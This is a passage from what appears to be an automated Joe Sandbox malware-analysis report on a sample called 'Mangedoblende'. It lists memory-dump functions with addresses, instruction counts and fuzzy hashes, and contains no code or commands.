                                                                                                                                                                            • Opcode ID: e67c89dc97f8e77502453540f89f5c3ed89fb2d684327f220cf5dfd4a1573361
                                                                                                                                                                            • Instruction ID: 3fbb485b426ed0f182a3a9c06248d0e13dbd710c01accc1af28f925433a3ca03
                                                                                                                                                                            • Opcode Fuzzy Hash: e67c89dc97f8e77502453540f89f5c3ed89fb2d684327f220cf5dfd4a1573361
                                                                                                                                                                            • Instruction Fuzzy Hash: 4D219C70E042499FCB05DFA5C950AEEBFB6AF49305F288069E405E73A0DB34EA41DF20
                                                                                                                                                                            Function 001862F0 Relevance: .1, Instructions: 62COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.3333182721.0000000000180000.00000040.00000800.00020000.00000000.sdmp, Offset: 00180000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_180000_Mangedoblende.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 0df3d0a0b1afee7f918a993728e734864bc8ae1fcb0ec21bf28a606c55ae38eb
                                                                                                                                                                            • Instruction ID: c6a4bc9147d460a59d1df1213b70230c58fc42a42d5e8f00265b91badf16d732
                                                                                                                                                                            • Opcode Fuzzy Hash: 0df3d0a0b1afee7f918a993728e734864bc8ae1fcb0ec21bf28a606c55ae38eb
                                                                                                                                                                            • Instruction Fuzzy Hash: 4811C235705A119FC72AAB29C85453E77B3BFC97613194179E80ACB3A9CF25DC028B90
                                                                                                                                                                            Function 0018F640 Relevance: .1, Instructions: 60COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.3333182721.0000000000180000.00000040.00000800.00020000.00000000.sdmp, Offset: 00180000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_180000_Mangedoblende.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: f7bbaa26d027a4093dc012bb492f7223919602508cae2509594f13f9e7140944
                                                                                                                                                                            • Instruction ID: e24e717547a9305a75904c00ebe71e7fa0929f8f21bfe078d53c198e2bc79426
                                                                                                                                                                            • Opcode Fuzzy Hash: f7bbaa26d027a4093dc012bb492f7223919602508cae2509594f13f9e7140944
                                                                                                                                                                            • Instruction Fuzzy Hash: 3A2172B4D046099FDB06EFA9C88079EBFF6FF85300F10C569E0149B265EB789A459F90
                                                                                                                                                                            Function 001827F0 Relevance: .1, Instructions: 57COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.3333182721.0000000000180000.00000040.00000800.00020000.00000000.sdmp, Offset: 00180000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_180000_Mangedoblende.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 8ebf9325ff9daa00f932c49453c48cd2d8fbc6a39586b69a901e61966e960db9
                                                                                                                                                                            • Instruction ID: d38b4b125b3a601ebd0844ce5f1444598ceea71b82e4309fb319e42dc80e0df4
                                                                                                                                                                            • Opcode Fuzzy Hash: 8ebf9325ff9daa00f932c49453c48cd2d8fbc6a39586b69a901e61966e960db9
                                                                                                                                                                            • Instruction Fuzzy Hash: 8921BD74D0520A8FCB05EFA9C9446EEBFF5AF4E300F10526AD815B7220EB345A95CFA1
                                                                                                                                                                            Function 00186FC4 Relevance: .1, Instructions: 57COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.3333182721.0000000000180000.00000040.00000800.00020000.00000000.sdmp, Offset: 00180000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_180000_Mangedoblende.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 4a3cc2308b4893909fa76affff5e64819d0711fe5de90a261c63cb2bcd259ff8
                                                                                                                                                                            • Instruction ID: a0ba5ecf95faef8f73dac21e071a5b5c12a88959dcedb063c54a74740127327e
                                                                                                                                                                            • Opcode Fuzzy Hash: 4a3cc2308b4893909fa76affff5e64819d0711fe5de90a261c63cb2bcd259ff8
                                                                                                                                                                            • Instruction Fuzzy Hash: 16117931904208DFCB24EF54C948FAABBF6EF49314F10842AE4199B291D775DE54CF90
                                                                                                                                                                            Function 0009D54F Relevance: .1, Instructions: 56COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.3332860487.000000000009D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0009D000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_9d000_Mangedoblende.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 1ddc261ec5c13bdc90f1bdf26e9e63e6361ff4a9f088bad488adb918b29214c2
                                                                                                                                                                            • Instruction ID: d69e46efdbe29a951339737457df942f3cbb745cdb93e1207d589161f8285eef
                                                                                                                                                                            • Opcode Fuzzy Hash: 1ddc261ec5c13bdc90f1bdf26e9e63e6361ff4a9f088bad488adb918b29214c2
                                                                                                                                                                            • Instruction Fuzzy Hash: 99112676544280CFCF02CF14D5C4B16BFB1FB94324F24C5AAD8090B256C33AD85ADBA2
                                                                                                                                                                            Function 0018F650 Relevance: .1, Instructions: 54COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.3333182721.0000000000180000.00000040.00000800.00020000.00000000.sdmp, Offset: 00180000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_180000_Mangedoblende.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 76b4f00117127bfff4c4e7ac170b890a90059b7fee3a32213877dbb3b274b985
                                                                                                                                                                            • Instruction ID: 40b61ba70fddcc04be03b0008ec205a2002180212584d6cb91a3149208cfbed3
                                                                                                                                                                            • Opcode Fuzzy Hash: 76b4f00117127bfff4c4e7ac170b890a90059b7fee3a32213877dbb3b274b985
                                                                                                                                                                            • Instruction Fuzzy Hash: 62115EB4D045099FDB05EFA9C98069EBFF6FF85300F10C569E0149B261EB786A459F80
                                                                                                                                                                            Function 000AD03F Relevance: .1, Instructions: 53COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.3332904191.00000000000AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 000AD000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_ad000_Mangedoblende.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 8bd4318166a5511db8e532d5d06596f6694e76da0c7d38603b81d7949cefb112
                                                                                                                                                                            • Instruction ID: 67592e55a2494d6eb8f8f76d7c43065ef0d20af7a33c42e195ffe8b9e35dc2c6
                                                                                                                                                                            • Opcode Fuzzy Hash: 8bd4318166a5511db8e532d5d06596f6694e76da0c7d38603b81d7949cefb112
                                                                                                                                                                            • Instruction Fuzzy Hash: 2611D075504244DFCB11CF50C5C4B15BBA2FB85314F24C6AED84A4B656C33AD84ACF52
                                                                                                                                                                            Function 2283EBE3 Relevance: .0, Instructions: 50COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.3351054478.0000000022830000.00000040.00000800.00020000.00000000.sdmp, Offset: 22830000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_22830000_Mangedoblende.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 6d4387fd037ea23dd0d5bcd11a33d6c01a46b7106422d68f639b545ea5b25df8
                                                                                                                                                                            • Instruction ID: ce964063b29aa27abc1f362fabc30378c06f158112e40da945a21dd3965de859
                                                                                                                                                                            • Opcode Fuzzy Hash: 6d4387fd037ea23dd0d5bcd11a33d6c01a46b7106422d68f639b545ea5b25df8
                                                                                                                                                                            • Instruction Fuzzy Hash: 69115EB6A50215CFC751AF78D548A5EBBF0FF4965172145A9E845D7321DB30C902CB90
                                                                                                                                                                            Function 0018ABD0 Relevance: .0, Instructions: 47COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.3333182721.0000000000180000.00000040.00000800.00020000.00000000.sdmp, Offset: 00180000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_180000_Mangedoblende.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: b4c47b0a0ad052401ddee91bc68f2637d1cd79311a2b3963a38cc006e05c44d6
                                                                                                                                                                            • Instruction ID: e70c3465ce120bfce5fbc37b636d7abf3fbe6aa1f1b22c72f16c6f3aeb79b213
                                                                                                                                                                            • Opcode Fuzzy Hash: b4c47b0a0ad052401ddee91bc68f2637d1cd79311a2b3963a38cc006e05c44d6
                                                                                                                                                                            • Instruction Fuzzy Hash: F30186317446104FA7157A2D985462D77EAEFC9B51355407BE509CB365EB21CD02CB41
                                                                                                                                                                            Function 00185EA4 Relevance: .0, Instructions: 46COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.3333182721.0000000000180000.00000040.00000800.00020000.00000000.sdmp, Offset: 00180000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_180000_Mangedoblende.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 749951938fe8a7a14a06d9741f2f73223dec6aaa098dce0154bb6cfd65f28983
                                                                                                                                                                            • Instruction ID: 83a41db500787b96ed1e0a55a5242245988db24ced1d550b2304d5814f1260db
                                                                                                                                                                            • Opcode Fuzzy Hash: 749951938fe8a7a14a06d9741f2f73223dec6aaa098dce0154bb6cfd65f28983
                                                                                                                                                                            • Instruction Fuzzy Hash: 08018B327005146BCB29EE599811AAF7BABDBC8750F148015F915D7248DF75CE219FD0
                                                                                                                                                                            Function 0018E8F3 Relevance: .0, Instructions: 41COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.3333182721.0000000000180000.00000040.00000800.00020000.00000000.sdmp, Offset: 00180000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_180000_Mangedoblende.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: bd7c0dba602d800f75046604e5b6148d5f7cd8e1ff8c6ac4c6d4e940647761d3
                                                                                                                                                                            • Instruction ID: 8e155c7c808f953480788231470ab4fad3ff61e78124360b5d56ccf108003411
                                                                                                                                                                            • Opcode Fuzzy Hash: bd7c0dba602d800f75046604e5b6148d5f7cd8e1ff8c6ac4c6d4e940647761d3
                                                                                                                                                                            • Instruction Fuzzy Hash: 71011A74E0460AAFCB01DFA4D9849AEFBB6FB89311F108165E910A3360D7789A15DF91
                                                                                                                                                                            Function 2283EB58 Relevance: .0, Instructions: 37COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.3351054478.0000000022830000.00000040.00000800.00020000.00000000.sdmp, Offset: 22830000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_22830000_Mangedoblende.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 310a99d24c5e75be358a55e54c26db085e057b303c06c4fba817aa59e5032fc0
                                                                                                                                                                            • Instruction ID: a0a8aee08dbc12b8c5e9d81843668c8b2262c8ec39d84d5d966ed910332b7553
                                                                                                                                                                            • Opcode Fuzzy Hash: 310a99d24c5e75be358a55e54c26db085e057b303c06c4fba817aa59e5032fc0
                                                                                                                                                                            • Instruction Fuzzy Hash: 6401F275E00219CFCF45EFB9C901AEEBBF5BF48200F10816AD519F7250E73899018BA0
                                                                                                                                                                            Function 2283E690 Relevance: .0, Instructions: 35COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.3351054478.0000000022830000.00000040.00000800.00020000.00000000.sdmp, Offset: 22830000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_22830000_Mangedoblende.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 3c6e171c34484cdb9efd3410ab2958832265aeb29726f80e08c25858f6b6ebf3
                                                                                                                                                                            • Instruction ID: 78a4a6acbeaa5f59964e1a3eed7f45bfa784b852f3652408139ef570497f1f76
                                                                                                                                                                            • Opcode Fuzzy Hash: 3c6e171c34484cdb9efd3410ab2958832265aeb29726f80e08c25858f6b6ebf3
                                                                                                                                                                            • Instruction Fuzzy Hash: F3F0B43A3083048FCB099B29D955D1A7BBAEFCA650B1504EAF509CB2B3EA20DC00C790
                                                                                                                                                                            Function 2283E6A0 Relevance: .0, Instructions: 33COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.3351054478.0000000022830000.00000040.00000800.00020000.00000000.sdmp, Offset: 22830000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_22830000_Mangedoblende.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 5ce5201e20070f13fc8d3c0db0d9f678f7b5b2b647b04666514dbecbaed3ecf0
                                                                                                                                                                            • Instruction ID: 3badb3854eb02e620e339e4011da9ef28ed6c7ce13196233d5981f1bc96ead30
                                                                                                                                                                            • Opcode Fuzzy Hash: 5ce5201e20070f13fc8d3c0db0d9f678f7b5b2b647b04666514dbecbaed3ecf0
                                                                                                                                                                            • Instruction Fuzzy Hash: 6CF082393002148FD7089B3ADA54A2A77AAEFC5710B1040A9F509CB3A2DE30DC01C790
                                                                                                                                                                            Function 00189C2C Relevance: .0, Instructions: 30COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.3333182721.0000000000180000.00000040.00000800.00020000.00000000.sdmp, Offset: 00180000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_180000_Mangedoblende.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 04e41b11ebfa0fdc0f86054737f49262f4a8817cd28ea19b56184d6cdc9b3eb4
                                                                                                                                                                            • Instruction ID: 3e04cc67ced5e1cd17bacf2c6bc837a826d9f261958fdf57b8a28946761a2e3b
                                                                                                                                                                            • Opcode Fuzzy Hash: 04e41b11ebfa0fdc0f86054737f49262f4a8817cd28ea19b56184d6cdc9b3eb4
                                                                                                                                                                            • Instruction Fuzzy Hash: 06F08C32A101189FCB04DF699808AFEBBF5EBC8321F14C12AE918D3264D3314A158F90
                                                                                                                                                                            Function 001828AA Relevance: .0, Instructions: 20COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.3333182721.0000000000180000.00000040.00000800.00020000.00000000.sdmp, Offset: 00180000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_180000_Mangedoblende.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: dc2e8a47abca32a0a3ebd777ebcc98a5ea89c89d542a18b120fbceab6b5a3370
                                                                                                                                                                            • Instruction ID: 76d9aacf60042319cf9b79354a9198ec10cb824187e02f6c0f2951c7f05ee307
                                                                                                                                                                            • Opcode Fuzzy Hash: dc2e8a47abca32a0a3ebd777ebcc98a5ea89c89d542a18b120fbceab6b5a3370
                                                                                                                                                                            • Instruction Fuzzy Hash: 9EE0C232D2022B8ACB10ABA4EC444EEFB34FED5351B814636D02076040EB30169AC6A0
                                                                                                                                                                            Function 001828B0 Relevance: .0, Instructions: 19COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.3333182721.0000000000180000.00000040.00000800.00020000.00000000.sdmp, Offset: 00180000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_180000_Mangedoblende.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 0dd205f0dfd06a01d78acd006ff686517ee2ec5e955cb107890bb505723a696c
                                                                                                                                                                            • Instruction ID: 029bc0a622d6c8ecf8e7d7f29d452ea5785f4d4c389dded27e885aa293771617
                                                                                                                                                                            • Opcode Fuzzy Hash: 0dd205f0dfd06a01d78acd006ff686517ee2ec5e955cb107890bb505723a696c
                                                                                                                                                                            • Instruction Fuzzy Hash: AFD05E32D2032B97CB00EBA5EC048EFFB38EED6261B958626D52437154FB702659C6E1
                                                                                                                                                                            Function 00188EF6 Relevance: .0, Instructions: 19COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.3333182721.0000000000180000.00000040.00000800.00020000.00000000.sdmp, Offset: 00180000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_180000_Mangedoblende.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: c9bd4ab73508ba573c7048a4f98628d98d3b83a04a7ae6dcc2b0b2536d4c5236
                                                                                                                                                                            • Instruction ID: 44e7980a1976a1f381adc37a37fe3cca3cb7b3d63875bcc790f549fdd833bd00
                                                                                                                                                                            • Opcode Fuzzy Hash: c9bd4ab73508ba573c7048a4f98628d98d3b83a04a7ae6dcc2b0b2536d4c5236
                                                                                                                                                                            • Instruction Fuzzy Hash: BBC0123324D1242E9625204E7C809A3774DC3D63B4A661137FA1CD3200DC425C8002E4
                                                                                                                                                                            Function 0018D6D4 Relevance: .0, Instructions: 16COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.3333182721.0000000000180000.00000040.00000800.00020000.00000000.sdmp, Offset: 00180000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_180000_Mangedoblende.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 9a0fec5d3d3288feb22ba2c0243cab043ae0376dc4f7379989771452cd73dfbe
                                                                                                                                                                            • Instruction ID: 57b1de50afeadcb433e48a1d3c0772104217b548141fc241ccdabc2b2c7cc397
                                                                                                                                                                            • Opcode Fuzzy Hash: 9a0fec5d3d3288feb22ba2c0243cab043ae0376dc4f7379989771452cd73dfbe
                                                                                                                                                                            • Instruction Fuzzy Hash: 56D04275E4410DCBCB24DFB8E4884DCBB71EF59321B20546AD925E3251E63455658F11
                                                                                                                                                                            Function 0018AFAD Relevance: .0, Instructions: 16COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.3333182721.0000000000180000.00000040.00000800.00020000.00000000.sdmp, Offset: 00180000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_180000_Mangedoblende.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: f57f30d79a26793ace2a651a074146d821ce3fa0f2535fff15a4695b151edaa6
                                                                                                                                                                            • Instruction ID: ceab4ea2608a2aead5d3d25e96176f550f5d0428cf538702b2b58e24634f2c06
                                                                                                                                                                            • Opcode Fuzzy Hash: f57f30d79a26793ace2a651a074146d821ce3fa0f2535fff15a4695b151edaa6
                                                                                                                                                                            • Instruction Fuzzy Hash: D5D0673AB400189FCB149F98E844CDDF776FB98221B048117E915A3265C7319965DB50
                                                                                                                                                                            Function 00186744 Relevance: .0, Instructions: 14COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.3333182721.0000000000180000.00000040.00000800.00020000.00000000.sdmp, Offset: 00180000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_180000_Mangedoblende.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 0cd9de4a62daecfa0236bb213e82ac32375572e533c4e2611df9cb296594d763
                                                                                                                                                                            • Instruction ID: b6ebec489240789963d6df114c85179c608b1abde706f3479bdc59170d1318ec
                                                                                                                                                                            • Opcode Fuzzy Hash: 0cd9de4a62daecfa0236bb213e82ac32375572e533c4e2611df9cb296594d763
                                                                                                                                                                            • Instruction Fuzzy Hash: 02D01231548B088EC907F765DC9559D772FEF81200B809E10F00A0B76FDEBC29865B90
                                                                                                                                                                            Function 00186748 Relevance: .0, Instructions: 12COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.3333182721.0000000000180000.00000040.00000800.00020000.00000000.sdmp, Offset: 00180000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_180000_Mangedoblende.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 578bb284886619f9d7cefaee6679f20d3cf72a7bee9be1f6d57c4a4ee534ab76
                                                                                                                                                                            • Instruction ID: 413f487c959bfb19fa9265cda3f64bf0306b07bf54c112ab9746f0c768d94a16
                                                                                                                                                                            • Opcode Fuzzy Hash: 578bb284886619f9d7cefaee6679f20d3cf72a7bee9be1f6d57c4a4ee534ab76
                                                                                                                                                                            • Instruction Fuzzy Hash: 32C01231508B088AC507F765DC45559772FEF802007808A10B00A0666FDE7C19855B90

                                                                                                                                                                            Non-executed Functions

                                                                                                                                                                            Function 22819180 Relevance: .3, Instructions: 292COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.3350992406.0000000022810000.00000040.00000800.00020000.00000000.sdmp, Offset: 22810000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_22810000_Mangedoblende.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: eb7762c2111d2fa42af8dc280313de8c6afa1cdc69ccc3aebe8db286a7b4e3c9
                                                                                                                                                                            • Instruction ID: 2a3dc5933b20f466dfc18f58c7f88b51ca08a91e81f33b75a4d228a789d28d60
                                                                                                                                                                            • Opcode Fuzzy Hash: eb7762c2111d2fa42af8dc280313de8c6afa1cdc69ccc3aebe8db286a7b4e3c9
                                                                                                                                                                            • Instruction Fuzzy Hash: DBD18F78E05318CFDB15DFA5C994B9DBBB2BF89300F2081A9D408A72A5DB359E81DF50
                                                                                                                                                                            Function 2281BC88 Relevance: .3, Instructions: 292COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.3350992406.0000000022810000.00000040.00000800.00020000.00000000.sdmp, Offset: 22810000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_22810000_Mangedoblende.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: fd6d45fa842f451a888a743770f0081dfc19ceb19d59baa8f32ec9680326475c
                                                                                                                                                                            • Instruction ID: eea36ae500160aed873844f2ecf5b3d9ae4ff1996d425cc8d7e3d97fa02dee27
                                                                                                                                                                            • Opcode Fuzzy Hash: fd6d45fa842f451a888a743770f0081dfc19ceb19d59baa8f32ec9680326475c
                                                                                                                                                                            • Instruction Fuzzy Hash: 42D18F74E04318CFDB55DFA5C994B9DBBB2BF89300F2081A9D408AB2A5DB359E81DF50
                                                                                                                                                                            Function 2281E790 Relevance: .3, Instructions: 292COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.3350992406.0000000022810000.00000040.00000800.00020000.00000000.sdmp, Offset: 22810000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_22810000_Mangedoblende.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: c5335f6b8fab393cc623cb4ed5dd4f6e4b35e73a0994b6cd8fa15d8917ed2975
                                                                                                                                                                            • Instruction ID: 0d5e81f5d7be7450430ca9ccb4e01cdd1c3e789e057f4e1507e151147fff6476
                                                                                                                                                                            • Opcode Fuzzy Hash: c5335f6b8fab393cc623cb4ed5dd4f6e4b35e73a0994b6cd8fa15d8917ed2975
                                                                                                                                                                            • Instruction Fuzzy Hash: 3FD18F74E05318CFDB15DFA5C984B9DBBB2BF89300F2081A9D409A72A5DB359E81DF50
                                                                                                                                                                            Function 22817998 Relevance: .3, Instructions: 292COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.3350992406.0000000022810000.00000040.00000800.00020000.00000000.sdmp, Offset: 22810000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_22810000_Mangedoblende.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 54d79cef3e45773910ef5e6ce22d3c7bafeb9a1f4820d7bb3bb77797273c88c1
                                                                                                                                                                            • Instruction ID: ebfa09e9aedbd51c89453d0d04d9131304f1531bd227b501158aaeefd940db5d
                                                                                                                                                                            • Opcode Fuzzy Hash: 54d79cef3e45773910ef5e6ce22d3c7bafeb9a1f4820d7bb3bb77797273c88c1
                                                                                                                                                                            • Instruction Fuzzy Hash: 57D18F74E01318CFDB55DFA5C994B9DBBB2BF89300F2081A9D408AB2A5DB359E81DF50
                                                                                                                                                                            Function 2281A4A0 Relevance: .3, Instructions: 292COMMON
